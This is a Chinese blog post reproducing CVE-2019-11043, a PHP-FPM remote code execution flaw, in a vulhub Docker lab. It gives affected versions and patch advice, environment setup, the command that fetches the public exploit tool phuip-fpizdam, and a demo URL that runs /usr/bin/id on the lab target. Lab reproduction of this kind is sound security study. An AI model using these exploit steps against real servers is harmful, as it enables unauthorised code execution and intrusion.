php定时执行代码漏洞_PHP远程代码执行漏洞(CVE201911043)复现

最新推荐文章于 2024-06-14 18:18:49 发布
最新推荐文章于 2024-06-14 18:18:49 发布
阅读量323 收藏
点赞数
文章标签: php定时执行代码漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39755873/article/details/112524668
版权
本文详细介绍了PHP的CVE-2019-11043漏洞,这是一个影响Nginx + PHP-FPM服务器的远程代码执行问题。当特定配置的Nginx与PHP版本7.0至7.3结合时,攻击者可以利用%0a字符触发漏洞。文章提供了实验环境的搭建过程,包括Docker的配置和漏洞复现步骤,包括使用go环境的exp进行攻击演示。
摘要由CSDN通过智能技术生成

74f9344bc8ab0e24fc536cd62ad21ef4.gif

漏洞详情
漏洞说明#

‍‍‍‍‍‍是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。

向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。

该漏洞需要在nginx.conf中进行特定配置才能触发

‍‍‍‍‍‍ 漏洞编号#

CVE-2019-11043

影响范围#

在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:

PHP 7.0 版本

PHP 7.1 版本

PHP 7.2 版本

PHP 7.3 版本

修复建议# 将PHP 7.1.X更新至7.1.33  将PHP 7.2.X更新至7.2.24 将PHP 7.3.X更新至7.3.11  

实验环境

攻击机:kali 2020.2

靶机:CentOS Linux7

项目地址:

https://github.com/vulhub/vulhub

3a0adca4008d25caa6889f8b50d4e84a.png

基础环境搭建

    安装docker

curl https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repoyum install https://download.docker.com/linux/fedora/30/x86_64/stable/Packages/containerd.io-1.2.6-3.3.fc30.x86_64.rpmyum install docker-cesystemctl start docker

    更换镜像源

vi /etc/docker/daemon.json

    修改文件内容,镜像源地址可以用阿里云的镜像地址,百度的镜像源会有一个包下载很慢。自己登陆阿里云获取

{        "registry-mirrors": ["https://xxxxx.mirrors.aliyun.com"]}

14d0636343e4d1ca71d7d0157c716148.png

保存退出之后,重新加载配置,重启docker

systemctl daemon-reloadsystemctl restart docker

摘取镜像

docker pull busybox

成功打印出"hello world"说明配置成功

docker run busybox echo “hello world”

到此docker配置完成

接下来部署实验环境

3a0adca4008d25caa6889f8b50d4e84a.png

实验环境搭建

项目地址

https://github.com/vulhub/vulhub

下载后上传至任意目录,进入目录

/vulhub-master/vulhub-master/php/CVE-2019-11043

启动docker编译

docker-compose up -d
dae857ac71392bcdc21a946cdf68074f.png

PS

很多人pip装不上,这里的方法亲测有效;

yum install -y python38wget https://bootstrap.pypa.io/get-pip.pysudo  python3 get-pip.pypip -versionpip install docker-compose

litbaiZhang

启动环境之后,就可以看到漏洞环境的默认页面。在此为http://127.0.0.1:8080/index.php

b9db0b54d5b54ab7128a151e11409999.png

3a0adca4008d25caa6889f8b50d4e84a.png

复现步骤

首先kali安装go环境

wget  -c https://storage.googleapis.com/golang/go1.13.3.linux-amd64.tar.gztar -C /usr/local -xzf go1.13.3.linux-amd64.tar.gzexport PATH=$PATH:/usr/local/go/binvim 编辑/etc/profile文件最后加上export PATH=$PATH:/usr/local/go/bin执行 source /etc/profile 命令 就安装成功了

6783ebd802313f166cc0077bfadeeb28.png

下载github上公开的exp

go get github.com/neex/phuip-fpizdam

然后编译

go install github.com/neex/phuip-fpizdam

使用exp攻击demo网站

308166749f452c35023a5c87e1a60c51.png

 http://192.168.91.133:8080/index.php?a=/usr/bin/id

97d1f14e040fbd2a8db00bc88ddb0065.png

攻击成功

还可以进行shell反弹,感兴趣的可以深入研究!

3a0adca4008d25caa6889f8b50d4e84a.png

853bd1e4a30b3a4e6ad000b9fcb0b260.gif b122a0b9a306efd300dc668f76c8a97a.png

Hi  这里是白泽Sec~

如果你想了解更多公众号的信息,

欢迎关注我哦~

既然在看了,就点一下吧!!

weixin_39755873
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
漏洞复现】redis未授权访问
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-16 1121
Redis服务在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器.上只运行一个Redis进程, 当多个客户端同时访问时,服务器的处理能力是会有一-定程度的下降;即:在实际生产环境中,需要根据实际的需求来决定开启多少个Redis进程。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。....
PHP 远程代码执行漏洞复现CVE-2019-11043
wo41ge的博客
02-05 1万+
漏洞名称 PHP 远程代码执行漏洞复现CVE-2019-11043 准备工作:安装 docker sudo apt-get install docker docker-compose 我这边已经安装过了 查看一下docker的版本 安装golang 环境 sudo apt install golang 搭建漏洞环境 git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043 docker-compose up -d
CVE-2019-11043(PHP远程代码执行漏洞复现
永远是少年
12-11 2261
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043(PHP远程代码执行漏洞复现。 一、CVE-2019-11043(PHP远程代码执行漏洞)简介 二、CVE-2019-11043(PHP远程代码执行漏洞漏洞环境搭建 三、CVE-2019-11043(PHP远程代码执行漏洞漏洞利用工具安装 四、CVE-2019-11043(PHP远程代码执行漏洞复现
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现
最新发布
fly夏天的博客
06-14 1180
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现
PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现
LRainner的博客
03-03 4336
PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现 环境搭建 git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043 docker-compose up -d 访问 安装漏洞利用工具 git clone https://github.com/neex/phuip-fpizdam.git cd phuip-fpizdam go env -w GOPROXY=https://goproxy.c
thinkPHP5.X 远程代码执行 漏洞复现
曝光黑客的那些小伎俩
05-15 410
https://greyhat.top/2018/12/11/thinkPHP5-RCE演练.html#more
CVE-2019-6339 Drupal 远程代码执行漏洞
m0_48520508的博客
01-15 821
0x00简介 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。Drupal是用作建设网站的。它是一个高度模块化,开源的web内容管理框架,它重点建立在合作之上的。它是一个可扩展的,适应标准的,并努力保持简洁代码和较小脚本的系统。Drupal 发布版中包含基本的核心功能,其他的额外功能可通过安装模块来获得。Drupal被设计为可被定制的,但是定制是通过覆写核心功能或者增加模块来完成的,而不是修改核心组件中的代码。它同样成功
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
热门推荐
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
wordpress php执行代码_【漏洞通告】PHP远程代码执行漏洞(CVE-2019-11043)
weixin_39742568的博客
11-23 149
1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年9月26日,PHP官方发布漏洞通告,其中指出:使用 Nginx + php-fpm的服务器,在部分配置下,存在远程代码执行漏洞.且该配置已被广泛使用,危害较大,影响较为广泛。...
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8770
ThinkPHP5系列远程代码执行漏洞复现(详细)
CVE-2019-11043(PHP远程代码执行漏洞
m0_51468027的博客
02-12 9010
一、漏洞描述   CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。   向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。   该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
【预警通告】php-fpm远程代码执行漏洞(CVE-2019-11043)
zjj1898的博客
10-30 269
这里写自定义目录标题综述受影响版本安全建议 综述 近日,国外安全研究员公布了一个存在于 php-fpm 中的漏洞(CVE-2019-11043),在某些特定Nginx 配置中,该漏洞可能会导致远程代码执行漏洞存在于文件sapi/fpm/fpm/fpm_main.c(https://github.com/php/php-src/blob/master/sapi/fpm/fpm/fpm_main....
PHPMailer 任意文件读取漏洞(CVE-2017-5223)复现
SoulCat
05-29 1753
你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切
cve-2019-11043分析
ckm1607011的博客
04-12 803
当url路径中存在%0a将其截断:http://127.0.0.1/index.php/123%0atest.php,加之Nginx处理url的正则有个bug,在解析的时候会把path_info置空; 漏洞函数fpm_request_info: 进入函数fpm_request_info: env_path_info为path_info的指针,虽然path_info为空,但是env_p...
cve漏洞复现php,CVE-2016-7124php反序列化漏洞复现
weixin_42557830的博客
03-19 441
CVE-2016-7124php反序列化漏洞复现0X00漏洞原因如果存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行0X01漏洞影响版本PHP5 < 5.6.25PHP7 < 7.0.100X02漏洞详情PHP(PHP:HypertextPreproce...
漏洞复现】CVE-2019-11043(PHP远程代码执行漏洞)信息安全论文_含漏洞复现完整过程_含Linux环境go语言编译环境安装
Thmos_vader的博客
05-23 1578
CVE-2019-11043漏洞PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行。 该漏洞普遍出现在Nginx+php-fpm环境中,且PHP版本在7.0-7.3之间。
Android WebView远程代码执行漏洞详解与影响
本文将深入探讨Android中WebView远程代码执行漏洞这一关键安全问题。Android API级别16及以下版本由于缺乏有效的安全防护措施,存在一个显著漏洞,即WebView.addJavascriptInterface方法的滥用可能导致远程攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值